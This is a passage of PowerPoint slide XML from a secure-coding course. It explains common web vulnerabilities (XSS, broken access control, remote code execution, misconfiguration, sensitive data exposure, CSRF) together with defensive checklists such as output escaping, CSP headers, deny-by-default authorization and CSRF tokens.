              <a:t>Encrypt sensitive data in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don't store sensitive data in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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Protect from Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D33E60-74C2-4484-AC99-0CD5BFA89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6E8A1FAE-C1AE-4A42-B19D-7DD9EB23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235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47</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5219630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS is possible when a web application dynamically includes user input in the web page's content without first properly validating the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The defect might be in client-side or server-side code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker can use this defect to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run a script in the victim's browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hijack user sessions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deface websites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirect the user to a malicious site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code analysis tools are not able to find all potential XSS problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual code review and testing is often necessary. Make sure that code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn’t pass untrusted data to JavaScript or other browser APIs that generate active content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escapes data on output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitizes HTML Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sets a Content-Security Policy (CSP) in HTTP headers:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Content-Security-Policy: script-src 'self' http://code.jquery.com; style-src 'self'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4" descr="Image result for web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hecklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46A3CB1-F89C-4703-BD2E-EB3A0C709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56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48</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457201" y="1302040"/>
            <a:ext cx="8382000" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application does not properly enforce restrictions on what authenticated users do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables attacker to access unauthorized functionality and data, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access other user accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View sensitive files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modify other user data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change access rights.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Secure Access Control (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D52419-6BBE-4CB1-B7F5-F409252D7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368A23C8-F67C-4BFB-9D90-DFED5FCFA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596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49</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97275" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To provide secure access control, make sure your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides a consistent, easy-to-analyze authorization module that is invoked from all of your business functions. Frequently, such protection is provided by one or more components external to the application code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Denies all access by default, explicitly granting access to specific roles </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for every function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensures that conditions are in the proper state to allow access to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>functions that are part of a workflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables entitlements to be easily updated and audited (not hard-coded).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protects each function and each type of data that requires access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not provide "side door" navigation to functions and data that require access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checks authentication and authorization on the server side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not expose direct object referencing schemes (such as a path and file name), but instead uses a per-user or per-session indirect reference to identify objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Use an index value to identify all files to which the current user has </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>authorized access, rather than a file path or database key that an attacker could </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use to figure out how to access other resources.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Secure Access Control (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64BC24F1-9C7D-4978-B408-32997B38E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B6A819E3-DDC6-4D5B-B646-702DC63E9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1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EBDC1-F3DB-4E4A-97A2-2A2F1C5F7291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Code Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82099159-0EB2-4703-8CF1-DE35B489ABC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A common goal of many exploits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows an attacker to access a device and make changes, regardless of geographical location.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ideal payload when a device is behind a firewall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run service or application with least privilege to minimize damage in case of compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630AF768-1C03-4D36-93BD-785B8AAFA105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55565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81001" y="1302040"/>
            <a:ext cx="8421074" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, platform, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure settings should be defined, implemented, and maintained, as defaults are often not secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unnecessary features should be removed or disabled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default logging and error messages should be reviewed to ensure </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>they don’t provide information helpful to an attacker. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software should be kept up to date.</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Security Misconfiguration (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B44A84-36CA-414F-BE56-A4FD5E04C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8F5B4307-BDBD-4F6B-8F14-1415A66B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665199"/>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275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51</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81001" y="1302040"/>
            <a:ext cx="8421074" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid security misconfiguration, make sure your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is configured through a repeatable hardening process that enables you to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>consistently deploy another environment that is properly locked down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development, QA, and production environments should all be configured identically (with different passwords used in each environment). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This process should be automated to minimize the effort required to set up a new secure environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes a facility to quickly receive updates and patches in all deployed environments, including the main software as well as supporting external components and libraries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Has been properly configured for security across all layers of the application stack, including host operating system, application runtime environment, web server, database server, frameworks, libraries, components, APIs, and supporting applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes a facility to provide periodic scanning and auditing for misconfiguration in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>all layers and components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is not running with any unnecessary features, including service ports, services, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pages, accounts, and privileges and any unsafe defaults, such as passwords, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user accounts, and groups.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Security Misconfiguration (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B44A84-36CA-414F-BE56-A4FD5E04C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853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52</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5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers may steal or modify such weakly protected data to conduct </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>credit card fraud, identity theft, or other crimes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive data requires extra protection (encryption at rest or in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>transit) and special precautions when exchanged with the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect, make sure your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypts all sensitive data at rest (including backups) and in transit to defend against attacks from internal and external attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not store any sensitive data that is unnecessary to support requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discards data as soon as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses strong standard encryption algorithms and strong keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disables autocomplete on forms collecting sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disables caching for pages that contain sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not reveal stack traces or other overly informative error messages </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes browser security directives and headers in any web requests </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and responses that transmit sensitive data.</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Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12900F11-0E07-493C-9297-AAD946359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7DF57659-247B-45E6-878B-AA0D945AD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39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53</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5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Attack protection goes far beyond basic input validation and involves </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>automatically detecting, logging, responding to, and even blocking </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>exploit attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Application owners also need to be able to deploy patches quickly </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to protect against attacks.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Sufficient Attack Protection (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EF8D706-FF65-4A5C-920C-17B30B69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A61D17F2-ED00-422D-8AED-711D228E2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487113"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756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54</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5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To provide sufficient attack protection, make sure your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Detects attacks and responds appropriately. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Events might occur that a legitimate user is not likely to cause (such as high-speed input, odd input patterns, repeated requests, etc.).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The application can help to protect itself, data, and users by monitoring for such events and providing appropriate interventions, such as ignoring requests, blocking IP addresses, or IP ranges, logging and notifying the user and/or system operator, disabling user accounts, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Is patched quickly. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Push protections out quickly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>When you can't push out patches and updates immediately, implement </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>provisional protections such as blocking certain traffic patterns to prevent</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>vulnerabilities from being exploited.</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Sufficient Attack Protection (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EF8D706-FF65-4A5C-920C-17B30B69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A61D17F2-ED00-422D-8AED-711D228E2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538707" y="3202678"/>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145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55</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8460149" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Such an attack allows the attacker to force a victim's browser to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>generate requests the vulnerable application thinks are legitimate </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requests from the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect, make sure your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Takes advantage of CSRF defenses built in to frameworks or application environments that it uses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes an unpredictable token in each HTTP request, using a hidden field for the token value, so it is not exposed in the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"SameSite=strict"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> flag on all cookies to prevent session cookies from being forwarded to a different domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires users to reauthenticate or prove they are human (using CAPTCHA, for example) when submitting a state-changing request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses a library such as OWASP's CSRF Guard or CSRFProtector </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to automatically add CSRF defenses.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Prevent CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC6EDF5-A5E4-4323-8D39-9ECCAAD3D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web png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF3E506-97CD-44DE-9A81-66E9C3766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34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56</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Components, such as libraries, frameworks, and other software modules, usually run with the same privileges as the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
